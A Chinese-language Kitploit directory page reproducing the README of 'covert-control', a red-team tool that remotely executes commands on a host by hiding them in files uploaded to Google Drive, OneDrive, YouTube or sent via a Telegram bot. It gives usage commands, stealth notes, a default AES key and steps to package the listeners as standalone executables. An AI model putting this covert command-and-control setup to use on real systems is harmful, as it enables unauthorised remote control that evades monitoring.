Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
covert-control — Google Drive、OneDrive 和 YouTube 作为隐蔽通道 - 通过上传文件到 Google Drive、OneDrive、YouTube 或 Telegram 远程控制系统 | Kitploit
工具/GitHubGitHub/ricardojoserf/covert-control
加密/解密工具数据泄露后渗透利用命令与控制红队
GitHubricardojoserf/covert-control

covert-control

Google Drive、OneDrive 和 YouTube 作为隐蔽通道 - 通过上传文件到 Google Drive、OneDrive、YouTube 或 Telegram 远程控制系统

查看仓库
7184年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

covert-control

通过将文件上传到 Google Drive、OneDrive、Youtube 或 Telegram 来远程控制系统,使用 Python 创建文件及监听器。支持创建文本文件、图像、音频或视频,命令可使用明文或 AES 加密。

  • covert-googledrive.py - 将文件上传至 Google Drive 的公共文件夹,控制系统。
  • covert-onedrive.py - 将文件上传至 OneDrive 的公共文件夹,控制系统。
  • covert-youtube.py - 将视频上传至 Youtube,控制系统(从 covert-tube 更新)。
  • covert-telegram.py - 通过 Telegram 机器人控制系统。

创建要上传的文件

你可以在 test_files 文件夹中找到示例文件,或使用 generate_file.py 创建新文件:

root@kitploit:~
python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]
  • -t (--type) [必填]:文件类型:"text"、"image"、"audio" 或 "video"。
  • -o (--outputfile) [可选]:输出文件。
  • -c (--command) [可选]:要执行的命令。
  • -e (--encrypted) [可选]:添加此标志可使用 AES 加密命令。

示例:

root@kitploit:~
python3 generate_file.py -t text  -c "whoami" -o text.txt
python3 generate_file.py -t text  -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e

配置

通用配置项:

  • data_type(可选,默认:"text"):

特定配置项:

  • googledrive_folder:要监控的公共 Google Drive 文件夹 URL(用于 covert-googledrive.py)。
  • onedrive_folder:要监控的公共 OneDrive 文件夹 URL(用于 covert-onedrive.py)。
  • youtube_channel_id:要监控的 Youtube 频道 ID。可从此处获取(Youtube 账户高级设置)(用于 covert-youtube.py)。
  • youtube_api_key:通过此处创建应用并生成 API 密钥(用于 covert-youtube.py)。
  • telegram_token:机器人令牌,使用 BotFather 创建。发送 "/newbot",然后为机器人提供名称(例如 "botname")和以 "-bot" 结尾的用户名(例如 "somethingrandombot")(用于 covert-telegram.py)。
  • telegram_username:指定一个 Telegram 用户名,使得仅执行来自该用户的命令(不带 "@")。

Google Drive

允许通过上传文本文件、图像、音频和视频(未加密或 AES 加密)来执行命令。可选的输入参数是公共文件夹 URL,也可以在 config.py 中配置:

root@kitploit:~
python3 covert-googledrive.py [FOLDER_URL]

默认情况下,监听器每 300 秒检查一次 Google Drive 文件夹(可在 config.py 中更新)。本例中上传了一个视频 "video.avi",命令包含在视频的二维码中:

img1

发现文件夹中有新文件上传后,将其下载、处理并执行命令:

img2


OneDrive

允许通过上传文本文件、图像、音频和视频(未加密或 AES 加密)来执行命令。可选的输入参数是公共文件夹 URL,也可以在 config.py 中配置:

root@kitploit:~
python3 covert-onedrive.py [FOLDER_URL]

默认情况下,监听器每 300 秒检查一次 OneDrive 文件夹(可在 config.py 中更新)。本例中上传了一个音频文件 "audio_encrypted.wav",命令使用 AES 加密:

img3

发现文件夹中有新文件上传后,将其下载、处理并执行命令:

img4

注意:这仅在你未删除文件夹中的任何文件时才有效;如果删除了,你必须创建一个新的。理论上也可以实现在删除文件后仍然工作,但这需要发送大量请求,隐蔽性较差。


Youtube

允许通过上传视频(未加密或 AES 加密)来执行命令。可选的输入参数是要监控的 Youtube 频道 ID 和 API 密钥,也可在 config.py 中配置:

root@kitploit:~
python3 covert-youtube.py [CHANNEL_ID] [API_KEY]

默认情况下,监听器每 300 秒检查一次 Youtube 频道(可在 config.py 中更新)。首先上传视频:

img5

发现频道中有新视频后,将其下载、处理并执行命令:

img6


Telegram

通过 Telegram 机器人远程控制系统。此选项不允许上传文件,但可以发送明文命令 (/cmd) 或 AES 加密命令 (/encrypted)。第一个可选输入参数是机器人令牌,也可在 config.py 中配置;第二个用于指定可以向机器人发送命令的单个 Telegram 用户(不带 "@"):

root@kitploit:~
python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]

监听器将检查聊天中的命令并显示输出:

root@kitploit:~
/cmd CLEARTEXT_COMMAND
/encrypted AES_ENCRYPTED_COMMAND

img7


安装

root@kitploit:~
sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/

创建独立可执行文件

root@kitploit:~
pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
下载工具
data_type文件类型加密适用平台扩展名
text文本文件否Google Drive, OneDrive.txt
text_encrypted文本文件是Google Drive, OneDrive.txt
image图像否Google Drive, OneDrive.png
image_encrypted图像是Google Drive, OneDrive.png
audio音频否Google Drive, OneDrive.wav
audio_encrypted音频是Google Drive, OneDrive.wav
video视频否Google Drive, OneDrive, Youtube.avi
video_encrypted视频是Google Drive, OneDrive, Youtube.avi
  • delay_seconds(可选,默认:300):检查 Google Drive 或 OneDrive 文件夹中新上传文件或 Youtube 频道中新视频的间隔秒数。

  • aes_key(可选,默认:"covert-control21"):AES 加密密钥。

  • debug(可选,默认:True):是否在监听器中打印消息和时间戳。